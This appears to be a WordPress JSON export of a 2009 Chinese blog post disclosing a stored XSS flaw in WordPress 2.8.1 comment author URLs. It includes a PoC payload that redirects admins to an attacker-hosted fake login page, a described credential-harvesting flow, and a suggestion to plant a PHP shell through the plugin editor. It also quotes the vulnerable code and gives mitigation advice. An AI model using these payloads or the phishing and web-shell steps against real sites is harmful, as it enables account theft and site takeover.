{"id":155,"date":"2009-07-16T13:54:49","date_gmt":"2009-07-16T13:54:49","guid":{"rendered":""},"modified":"2011-04-25T08:37:34","modified_gmt":"2011-04-25T08:37:34","slug":"wordpress281%e8%af%84%e8%ae%ba%e6%98%be%e7%a4%baxss%e6%bc%8f%e6%b4%9e","status":"publish","type":"post","link":"https:\/\/www.inbreak.net\/archives\/155.html","title":{"rendered":"wordpress281\u8bc4\u8bba\u663e\u793axss\u6f0f\u6d1e"},"content":{"rendered":"

wordpress281<\/span>\u8bc4\u8bba\u663e\u793axss<\/span>\u6f0f\u6d1e<\/o:p><\/span><\/span><\/p>\n

by kxlzx inbreak.net<\/span><\/p>\n

 <\/p>\n

ps\uff1a\u611f\u8c22\u9b3c\u4ed4’blog<\/a>\uff0cXEYE’s blog<\/a>\u534f\u52a9\u6d4b\u8bd5\u3002<\/span><\/span><\/p>\n

<\/o:p><\/span><\/p>\n

\u5b9e\u9645\u4e0a\u662f\u4e2aXSS<\/span>\u6f0f\u6d1e\u3002<\/o:p><\/span><\/span><\/p>\n

 <\/o:p><\/span><\/p>\n

POC<\/span>\uff1a<\/span><\/strong><\/p>\n

\n
XML\/HTML\u4ee3\u7801<\/div>\n
    \n
  1. \u5728\u8bc4\u8bba\u7684\u7f51\u5740\u4e00\u680f\uff0c\u586b\u5199   <\/span><\/span><\/li>\n
  2.   <\/span><\/li>\n
  3. http:\/\/blog.sohu.com\/fh8e3333211134333\/f8e9wjfidsj3332dfs’ <\/span>onmousemove<\/span>=’<\/span>location.href<\/span>=<\/span>String<\/span>.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);   <\/span><\/li>\n<\/ol>\n<\/div>\n

     \u8fd9\u6bb5\u4ee3\u7801\u4ec5\u4f9b\u6d4b\u8bd5\uff0c\u662f\u4e0d\u80fd\u76f4\u63a5\u7528\u7684\u3002<\/o:p><\/span><\/span><\/p>\n

    \u5982\u679c\u4f60\u62ff\u6211\u7684shellcode<\/span>\u53bb\u6253\u522b\u4eba\u7684\u7ad9\uff0c\u90a3\u5bc6\u7801\u5c31\u5f52\u6211\u4e86\uff0c\u6765\u4e4b\u4e0d\u62d2\u554a\u3002<\/o:p><\/span><\/span><\/p>\n

     <\/o:p><\/span><\/p>\n

    \u7ba1\u7406\u5458\u5ba1\u6838\u65f6\uff0c\u53ea\u8981\u9f20\u6807\u4eceurl<\/span>\u4e0a\u8def\u8fc7\uff0c\u5c31\u4f1a\u8df3\u8f6c\u5230http:\/\/inbreak.net\/a.php<\/font><\/a><\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    <\/o:p><\/span><\/p>\n

    \u8fd9\u91cc\u662f\u4e2a\u5047\u7684\u767b\u5f55\u9875\u9762\uff0c\u9493\u9c7c\u7528\u3002<\/o:p><\/span><\/span><\/p>\n

    \"1.jpg\"<\/a><\/o:p><\/span><\/p>\n

    \u7ba1\u7406\u5458\u767b\u5f55\u540e\uff0c\u6211\u4eec\u5c31\u80fd\u8bb0\u5f55\u5bc6\u7801\u3002<\/o:p><\/span><\/span><\/p>\n

    \"2.jpg\"<\/a><\/span><\/o:p><\/span><\/p>\n

    <\/o:p><\/span><\/p>\n

    \u5bf9\u4e8e\u6574\u4e2a\u6d41\u7a0b\u8bf4\u660e\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

    1<\/span>\uff0c\u53d1\u8bc4\u8bba\u8ba9\u7ba1\u7406\u5458\u5bf9\u4f60\u7684url<\/span>\u6709\u5174\u8da3\uff0c\u7136\u540e\u7b49\u7ba1\u7406\u5458\u4e0a\u94a9\u3002<\/o:p><\/span><\/span><\/p>\n

    2<\/span>\uff0c\u7ba1\u7406\u5458\u5728\u540e\u53f0\u628a\u9f20\u6807\u79fb\u52a8\u5230\u4f60\u7684url<\/span>\u4e0a\u3002<\/o:p><\/span><\/span><\/p>\n

    3<\/span>\uff0c\u8df3\u8f6c\u5230a.php<\/span>\uff0c\u5148\u83b7\u53d6referer<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    4<\/span>\uff0c\u8f93\u5165\u5bc6\u7801\u540e\uff0c\u63d0\u4ea4\u5230kxlzxtest\/testxss\/wp.php<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    5<\/span>\uff0creferer<\/span>\uff0cuser<\/span>\uff0cpass<\/span>\u4fdd\u5b58\u4e3a"<\/span>\u57df\u540d.txt"<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

    6<\/span>\uff0c\u8f93\u51fa\u4e00\u6bb5JS<\/span>\uff0c\u8df3\u8f6c\u5230referer<\/span>\u5730\u5740\u53bb\u3002<\/o:p><\/span><\/span><\/p>\n

     <\/o:p><\/span><\/p>\n

    a.php<\/span>\u4ee3\u7801\uff1a<\/span><\/strong><\/p>\n

    \n
    PHP\u4ee3\u7801<\/div>\n
      \n
    1. <?php   <\/span><\/span><\/li>\n
    2.   <\/span><\/li>\n
    3. $website<\/span> = <\/span>$_SERVER<\/span>[<\/span>‘HTTP_REFERER’<\/span>];   <\/span><\/li>\n
    4.   <\/span><\/li>\n
    5. $website<\/span>=<\/span>strtolower<\/span>(<\/span>$website<\/span>);   <\/span><\/li>\n
    6.   <\/span><\/li>\n
    7. $website<\/span>=<\/span>substr<\/span>(<\/span>$website<\/span>,7);   <\/span><\/li>\n
    8.   <\/span><\/li>\n
    9. $website<\/span>=<\/span>substr<\/span>(<\/span>$website<\/span>,0,<\/span>strpos<\/span>(<\/span>$website<\/span>,<\/span>‘\/’<\/span>));   <\/span><\/li>\n
    10.   <\/span><\/li>\n
    11.     <\/span><\/li>\n
    12.   <\/span><\/li>\n
    13. \/\/\u8fd9\u4e2a\u9875\u9762\u662f\u7528\u6765\u5192\u5145\u767b\u5f55\u9875\u9762\u7684\uff0c\u5371\u5bb3\u5de8\u5927\uff0c\u4ee3\u7801\u4e0d\u65b9\u4fbf\u63d0\u4f9b\u3002 <\/span>  <\/span><\/li>\n
    14.   <\/span><\/li>\n
    15.     <\/span><\/li>\n
    16.   <\/span><\/li>\n
    17. ?>   <\/span><\/li>\n
    18.   <\/span><\/li>\n<\/ol>\n<\/div>\n

       wp.php<\/span>\u4ee3\u7801<\/o:p><\/span><\/span><\/strong><\/p>\n

       <\/p>\n

      <\/o:p><\/span><\/p>\n

      <\/o:p><\/span>\u55ef\u3002\u3002\u3002\u672c\u6765\u6253\u7b97\u548c\u67d0\u4e2a\u77ed\u4fe1\u5e73\u53f0\u914d\u5408\u4e00\u4e0b\uff0c\u7ed9\u6211\u53d1\u77ed\u4fe1\u63d0\u9192\u7684\uff0c\u540e\u6765\u56e0\u4e3a\u61d2\uff0c\u5c31\u6ca1\u5199\u3002<\/span><\/p>\n

      \n
      SHELL\u4ee3\u7801<\/div>\n
        \n
      1. <?<\/span>php<\/span>       <\/span><\/span><\/li>\n
      2.   <\/span><\/li>\n
      3. \/\/\u88ablv\u8001\u5b50\u8fc7\u6ee4\u3002   <\/span><\/li>\n
      4.   <\/span><\/li>\n
      5. ?><\/span>      <\/span><\/li>\n<\/ol>\n<\/div>\n

         \u8fd9\u53ea\u662f\u4e2aDEMO<\/span>\uff0c\u5b9e\u9645\u4e0a\uff0c\u540e\u53f0\u6709\u7f16\u8f91PHP<\/span>\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u4f60\u53ef\u4ee5\u5199\u4e2aAJAX<\/span>\u51fa\u6765\uff0c\u81ea\u52a8\u83b7\u53d6\u7f16\u8f91\u63d2\u4ef6\u6587\u4ef6\u7684\u9875\u9762\u4e2d\u7684token<\/span>\u5b57\u6bb5\uff08\u540d\u5b57\u5fd8\u8bb0\u4e86\uff0c\u53eb\u505aXXonce<\/span>\uff09\uff0c\u4e4b\u540e\u63d0\u4ea4\u4e00\u4e2aPHP shell<\/span>\u8fc7\u53bb\u3002\u5c31\u4e0d\u7528\u9493\u9c7c\u4e86\u3002<\/o:p><\/span><\/span><\/p>\n

         <\/o:p><\/span><\/p>\n

        \u6f0f\u6d1e\u4ee3\u7801\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

        wordpress\\wp-admin\\includes\\template.php<\/o:p><\/span><\/p>\n

        \u6587\u4ef6\u4e2d\u7684$author_url<\/span>\u6ca1\u6709\u5bf9\u5355\u5f15\u53f7\u505a\u8fc7\u6ee4\uff0c\u6700\u540e\u53c8\u4f7f\u7528\u62fc\u63a5href=’$author_url’<\/span>\u3002<\/o:p><\/span><\/span><\/p>\n

        \u5bfc\u81f4\u6211\u4eec\u53ef\u4ee5\u6dfb\u52a0\u4e00\u4e2a\u8fd9\u4e2ahref<\/span>\u7684\u4e8b\u4ef6\u51fd\u6570\u8fdb\u53bb\u3002<\/span><\/p>\n

        <\/p>\n

        \n
        PHP\u4ee3\u7801<\/div>\n
          \n
        1.   <\/span><\/li>\n
        2. 2085:<\/span>$author_url<\/span> = get_comment_author_url();   <\/span><\/li>\n
        3.   <\/span><\/li>\n
        4.  <\/li>\n
        5.   <\/span><\/li>\n
        6. 2182:<\/span>case<\/span> <\/span>‘author’<\/span>:   <\/span><\/li>\n
        7.   <\/span><\/li>\n
        8.   <\/span>echo<\/span> <\/span>"<td $attributes><strong>"<\/span>; comment_author(); <\/span>echo<\/span> <\/span>‘<\/strong><br \/>’<\/span>;   <\/span><\/li>\n
        9.   <\/span><\/li>\n
        10.      <\/span>if<\/span> ( !<\/span>empty<\/span>empty<\/span>(<\/span>$author_url<\/span>) )   <\/span><\/li>\n
        11.   <\/span><\/li>\n
        12.          <\/span>echo<\/span> <\/span>"<a title=’$author_url’ href=’$author_url’>$author_url_display<\/a><br \/>"<\/span>;   <\/span><\/li>\n
        13.  <\/span><\/li>\n<\/ol>\n<\/div>\n

          <\/span><\/p>\n

           <\/p>\n

           \u524d\u53f0\u7684\u8bc4\u8bba\u5c55\u793a\uff0c\u4e5f\u5b58\u5728\u8fd9\u4e2a\u6f0f\u6d1e<\/strong>\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/p>\n

          \u4fee\u8865\u65b9\u5f0f\uff1a<\/o:p><\/span><\/strong><\/span><\/p>\n

          \u4e0d\u5efa\u8bae\u81ea\u5df1\u624b\u5de5\u4fee\u8865\uff0c\u5efa\u8bae\u628a\u8bc4\u8bba\u6682\u65f6\u5173\u95ed\uff0c\u7136\u540e\u7b49\u5b98\u65b9\u8865\u4e01\u5c31\u662f\u4e86\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

          \u5230\u76ee\u524d\u4e3a\u6b62\uff0c\u5b98\u65b9\u53ef\u80fd\u8fd8\u4e0d\u77e5\u9053\u3002<\/span><\/p>\n

           <\/p>\n

          \u8bed\u8a00\u4e0d\u901a\uff0c\u597d\u5fc3\u4eba\u770b\u5230\u540c\u65f6\uff0c\u53ef\u4ee5\u901a\u77e5\u4e0b\u5b98\u65b9\u3002<\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

           <\/p>\n","protected":false},"excerpt":{"rendered":"

          wordpress281<\/span>\u8bc4\u8bba\u663e\u793axss<\/span>\u6f0f\u6d1e<\/o:p><\/span><\/span><\/p>\n

          by kxlzx inbreak.net<\/span><\/p>\n

          <\/o:p><\/span><\/p>\n

          ps\uff1a\u611f\u8c22\u9b3c\u4ed4’blog<\/a>\uff0cXEYE’s blog<\/a>\u534f\u52a9\u6d4b\u8bd5\u3002<\/span><\/p>\n

          \u5b9e\u9645\u4e0a\u662f\u4e2aXSS<\/span>\u6f0f\u6d1e\u3002<\/o:p><\/span><\/span><\/p>\n

           <\/o:p><\/span><\/p>\n

          POC<\/span>\uff1a<\/o:p><\/span><\/span><\/p>\n

          \u5728\u8bc4\u8bba\u7684\u7f51\u5740\u4e00\u680f\uff0c\u586b\u5199<\/o:p><\/span><\/span><\/p>\n

          http:\/\/blog.sohu.com\/fh8e3333211134333\/f8e9wjfidsj3332dfs<\/a>‘ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);<\/o:p><\/span><\/p>\n

          \u7ee7\u7eed\u9605\u8bfb »<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,5],"tags":[52,24],"views":11458,"_links":{"self":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155"}],"collection":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/comments?post=155"}],"version-history":[{"count":1,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155\/revisions"}],"predecessor-version":[{"id":225,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/posts\/155\/revisions\/225"}],"wp:attachment":[{"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/media?parent=155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/categories?post=155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.inbreak.net\/wp-json\/wp\/v2\/tags?post=155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}